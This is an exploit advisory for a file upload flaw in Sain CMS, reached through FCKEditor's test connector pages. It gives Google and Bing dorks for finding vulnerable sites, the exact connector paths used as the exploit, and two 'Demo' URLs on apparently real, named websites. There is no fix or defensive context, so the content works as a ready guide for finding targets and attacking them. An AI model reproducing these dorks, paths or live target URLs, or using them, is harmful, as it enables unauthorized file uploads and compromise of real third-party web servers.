Sain CMS File Upload Vulnerability (FCKEditor)

Author: Iran Cyber Security Group, Published: 08-06-2015

# Exploit Title : Sain CMS File Upload Vulnerability (FCKEditor)

# Date : 07/06/2015

# Exploit Author : Iran Cyber Security Group

# Discovered By : WH!T3 W01F

# Contact : whit3_w01f@att.net

# Software Link : sain.ir

# Version : All Versions

# Category : Web Application Bugs

# Google Dork : site:.ir intext:Powered By SAIN

# Bing Dork : "Powered By SAIN"

# Tested On : Windows

# Home : Iran-Cyber.Org

PoC :

Exploit 1 : site.com/html/js/editor/fckeditor/editor/filemanager/connectors/test.html

Exploit 2 : site.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

Demo :

http://yazdp.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

http://yfajr.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

# Thanks To : root3r - KamraN HellisH - MOHAMAD-NOFOZI - Sheytan Azzam - JOK3R - CRYSIS BL4CK And All Members of Iran Cyber Security Group
